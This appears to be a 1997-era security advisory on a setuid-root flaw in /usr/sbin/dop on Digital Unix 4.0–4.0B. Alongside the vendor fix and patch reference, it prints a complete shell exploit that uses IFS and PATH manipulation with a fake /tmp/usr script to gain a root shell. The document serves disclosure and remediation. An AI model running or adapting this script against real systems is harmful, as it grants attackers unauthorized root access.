COMMAND

    /usr/sbin/dop

SYSTEMS AFFECTED

    Digital Unix 4.0, 4.0A, 4.0B

PROBLEM

    Jon Thingvold found hole in Dec  UNIX. In  DEC Unix 4.0,  4.0A and
    4.0B you will find /usr/sbin/dop  setuid root. This program has  a
    small and not very serious bug(?) (his exploit follows):

    ----------------------------cut here------------------------------
        #!/bin/sh
        cat > /tmp/usr <<EOF
        #!/bin/sh
        IFS="   "
        export IFS
        exec /bin/sh
        EOF
        chmod 755 /tmp/usr
        IFS=/ PATH=/tmp:$PATH /usr/sbin/dop crack-user=root
    ----------------------------cut here------------------------------

    All you  have to  do is  to run  this script  and get  a free root
    shell.

SOLUTION

    Since this is another "suid vulnerability", quick fix is obvious:

        chmod a-s /usr/sbin/dop

    This potential security  issue has been  resolved and an  official
    fix for this problem will be made available beginning the 13th  of
    March 1997. As the patches become available per affected  version,
    Digital will provide them through:

        ftp://ftp.service.digital.com/public/

    the sub directory Digital_UNIX, key identifier SSRT0435U.

    Note that: The patch kits mentioned above will be replaced in  the
               near future through normal patch release procedures,
               The  appropriate   patch  kit   must  be    reinstalled
               following any  upgrade beginning  with V4.0  up to  and
               including V4.0b.